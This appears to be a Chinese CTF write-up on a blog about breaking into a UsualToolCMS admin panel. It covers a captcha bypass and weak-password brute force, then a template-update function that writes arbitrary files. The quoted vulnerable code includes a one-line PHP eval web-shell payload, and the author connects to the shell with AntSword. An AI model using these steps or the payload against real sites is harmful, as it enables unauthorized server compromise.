验证码绕过wp

Itachi
  2021-12-23 21:16:23 2021-12-23 21:16:23 创建   2021-12-23 23:01:55 2021-12-23 23:01:55 更新      

拿到一个网站,在最下面可以看到Prowed by UsualToolCMS
img
下载到该 CMS 的源码,发现有 cmsadmin
img
访问
img
可能存在验证码绕过,抓包看一下
img
img
弱密码爆一下
img
成功登录,访问该目录下的 flag.php
发现 a_templetex.php中有更新数据的地方,我们可以在这里插马

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
<?php
require_once 'a_top.php';
$t=UsualToolCMS::sqlcheck($_GET["t"]);
$x=UsualToolCMS::sqlcheck($_GET["x"]);				//x=m
if($x=="m"){
$filename=$_POST["filename"];						//filename=1.php
$dir=$_POST["dir"];
$content=$_POST["content"];
$id=UsualToolCMS::sqlcheckx($_POST["id"]);
$tp=$_POST["tp"];
$contents=iconv("utf-8","utf-8",$content);
$filenames="../".$dir."/".$filename."";
file_put_contents($filenames,$contents);			//content=<?php eval($_REQUEST[8])?>
echo "<script>alert('更新模板成功!');window.location.href='?t=edit&id=$id&filename=$filename&dir=$dir&tp=$tp'</script>";
}

抓包传数据
img
显示模板更新成功,意为着马已经传上去了,可以直接连
img
img
连蚁剑
img

  • 标题: 验证码绕过wp
  • 作者: Itachi
  • 创建于 : 2021-12-23 21:16:23
  • 更新于 : 2021-12-23 23:01:55
  • 链接: https://blog.tarchi.top/web/验证码绕过wp/
  • 版权声明: 本文章采用 CC BY-NC-SA 4.0 进行许可。
 评论
此页目录
验证码绕过wp